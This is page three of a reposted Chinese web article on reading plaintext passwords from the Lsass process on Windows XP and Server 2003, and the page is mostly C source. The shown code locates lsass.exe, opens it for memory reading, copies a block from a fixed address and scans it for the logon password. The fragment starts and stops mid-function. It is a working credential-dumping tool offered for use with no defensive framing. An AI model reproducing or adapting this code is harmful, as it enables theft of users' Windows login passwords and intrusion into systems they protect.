[收藏本方案]

XP 和2003的Lsass进程中明文密码[3]

[入库:2005年8月18日] [更新:2007年3月24日]

本文简介:选择自 kernet 的 blog
首页 上页 尾页 [1] [2] [3]

nbsp;                break;
                    }
                }
                return i + 7;        // one flag to indicate we find the password
            }
        }
    }
    return -1;        // well,we fail to find the password,and this always happens
}
// end search

//------------------------------------------------------------------------------------
// purpose: to get the lsass.exe pid
// return type: dword
// parameters:  none
//------------------------------------------------------------------------------------
dword getlsasspid()
{
    handle hprocesssnap;
    handle hprocess = null;
    processentry32 pe32;
    dword pid = 0;

    hprocesssnap = createtoolhelp32snapshot(th32cs_snapprocess, 0);
    if( hprocesssnap == invalid_handle_value )
    {
        printf("fail to create snap shot\n");
        return 0;
    }

    pe32.dwsize = sizeof(processentry32);

    if( !process32first(hprocesssnap, &pe32))
    {
        closehandle(hprocesssnap);     // must clean up the snapshot object!
        return 0;
    }

    do
    {
        if (strcmpi(pe32.szexefile,"lsass.exe") == 0)
        {
            pid = pe32.th32processid;
            break;
        }
    }while(process32next( hprocesssnap, &pe32));

    closehandle( hprocesssnap);
    return pid;
}
// end getlsasspid()

//------------------------------------------------------------------------------------
// purpose: to find the password
// return type: boolean
// parameters:  
//           in: dword pid        ->        the lsass.exe's pid
//------------------------------------------------------------------------------------
bool findpassword(dword pid)
{
    handle hprocess = null;
    char   buffer[5 * 1024] = {0};
    dword  byteget = 0;
    int    found = -1;

    hprocess = openprocess(process_vm_read,false,pid);        // open process
    if (hprocess == null)
    {
        printf("fail to open process\n");
        return false;
    }

    if (!readprocessmemory(hprocess,(pvoid)baseaddress,buffer,5 * 1024,&byteget))        // read the memory from lsass.exe
    {
        printf("fail to read memory\n");
        closehandle(hprocess);
        return false;
    }

    closehandle(hprocess);

    found = search(buffer,byteget);        // search the password
    if (found >= 0)        // we may find the password
    {
        if (strlen(password) > 0)     &

首页 上页 尾页 [1] [2] [3]
本文关键:XP 和2003的Lsass进程中明文密码
  相关方案
Google
 

本站最佳浏览方式为 分辨率 1024x768 IE 6.0(或更高版本的 IE浏览器)

go top